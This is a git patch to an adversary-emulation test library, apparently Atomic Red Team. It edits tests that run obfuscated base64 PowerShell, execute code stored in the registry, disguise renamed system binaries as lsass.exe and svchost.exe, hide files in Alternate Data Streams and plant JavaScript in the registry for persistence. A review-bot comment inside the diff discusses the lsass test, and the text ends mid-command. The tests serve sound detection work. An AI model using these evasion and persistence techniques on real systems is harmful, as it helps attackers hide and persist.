From 1f74427802d8fb6a36f0d41f093e019f97e46261 Mon Sep 17 00:00:00 2001 From: Andrew Beers Date: Thu, 19 Mar 2020 12:17:08 -0700 Subject: [PATCH] Add completion description and fixes 2nd batch (#894) * Add completion description and fixed * fix spelling * wording update Co-authored-by: Carrie Roberts --- atomics/T1027/T1027.yaml | 5 ++--- atomics/T1036/T1036.yaml | 10 ++++------ atomics/T1096/T1096.yaml | 4 ++-- atomics/T1112/T1112.yaml | 4 ++-- atomics/T1170/T1170.yaml | 9 +++++---- atomics/T1202/T1202.yaml | 18 +++++------------- 6 files changed, 20 insertions(+), 30 deletions(-) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4a4bb0a6..7bd7e3ac 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -23,7 +23,7 @@ atomic_tests: - name: Execute base64-encoded PowerShell description: | Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. - + Upon execution the test will print "Hey, Atomic!" to the PowerShell session supported_platforms: - windows input_arguments: @@ -39,7 +39,6 @@ atomic_tests: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) $EncodedCommand - powershell.exe -EncodedCommand $EncodedCommand - name: Execute base64-encoded PowerShell from Windows Registry @@ -73,4 +72,4 @@ atomic_tests: Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))" cleanup_command: | - Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} \ No newline at end of file + Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} 
diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index c7f0fb5a..c122dbaa 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml @@ -6,7 +6,7 @@ atomic_tests: - name: Masquerading as Windows LSASS process description: | Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. - + Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session supported_platforms: - windows @@ -14,8 +14,8 @@ atomic_tests: name: command_prompt elevation_required: false command: | - cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe - cmd.exe /c %SystemRoot%\Temp\lsass.exe + copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe + %SystemRoot%\Temp\lsass.exe /B cleanup_command: | del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 @@ -36,10 +36,8 @@ atomic_tests: - name: Masquerading - cscript.exe running as notepad.exe description: | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. - supported_platforms: - windows - executor: name: command_prompt elevation_required: false @@ -52,7 +50,7 @@ atomic_tests: - name: Masquerading - wscript.exe running as svchost.exe description: | Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. - + Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder supported_platforms: - windows diff --git a/atomics/T1096/T1096.yaml b/atomics/T1096/T1096.yaml index 749c335c..58490ed0 100644 --- a/atomics/T1096/T1096.yaml +++ b/atomics/T1096/T1096.yaml 
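Review bot: In the `@@ -14,8 +14,8 @@` hunk the new second command, `%SystemRoot%\Temp\lsass.exe /B`, launches the renamed cmd.exe with no `/c`, so it sits waiting for interactive input — which is exactly why the new description has to warn that the test hangs until the 120-second timeout. cmd.exe documents no `/B` switch (that is an option of `start`), so it does not appear to change that behaviour. Giving the copy something to run and exit, e.g. `%SystemRoot%\Temp\lsass.exe /c echo Masquerading as lsass.exe`, still produces the process-creation event a detection would key on (an `lsass.exe` image executing from `%SystemRoot%\Temp`) while letting the executor finish on its own. It also matters for cleanup_command: while the copy is still running its image is mapped, and the `del` is likely to fail unless the runner has already killed the process.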
@@ -38,7 +38,7 @@ atomic_tests: - name: Store file in Alternate Data Stream (ADS) description: | Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. - + Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test supported_platforms: - windows @@ -66,4 +66,4 @@ atomic_tests: } Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: | - Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore \ No newline at end of file + Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 8fc126b6..30ca09e3 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -159,7 +159,7 @@ atomic_tests: - name: Javascript in registry description: | - placing javascript in registry for persistence + Upon execution, a javascript block will be placed in the registry for persistence supported_platforms: - windows executor: @@ -168,4 +168,4 @@ atomic_tests: command: | New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "